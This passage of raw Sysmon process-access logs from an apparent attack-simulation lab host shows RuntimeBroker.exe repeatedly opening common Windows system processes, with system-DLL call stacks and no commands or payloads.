1092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006603Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006602Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006601Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006600Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006599Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006598Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006597Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006596Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006595Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006594Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006593Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-A200-00000000AE01}3108C:\Windows\system32\userinit.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006592Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C4-6064-9D00-00000000AE01}5112C:\Windows\system32\svchost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006591Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C3-6064-9A00-00000000AE01}3164C:\Windows\System32\rdpclip.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006590Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8300-00000000AE01}4472C:\Windows\system32\conhost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006589Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.402{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-6497-6064-8200-00000000AE01}4432C:\Windows\system32\WinrsHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006588Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006587Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006586Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D2-6064-B500-00000000AE01}5416C:\Windows\system32\DllHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006585Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C8-6064-AB00-00000000AE01}5080C:\Windows\system32\rundll32.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006584Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:30.387{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x3200C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\deviceaccess.dll+2da89|C:\Windows\System32\deviceaccess.dll+1713b|C:\Windows\System32\deviceaccess.dll+17524|C:\Windows\System32\deviceaccess.dll+17485|C:\Windows\System32\deviceaccess.dll+18249|C:\Windows\System32\deviceaccess.dll+17fd6|C:\Windows\system32\windows.cortana.onecore.dll+bb0f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 10341000x80000000000000006583Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 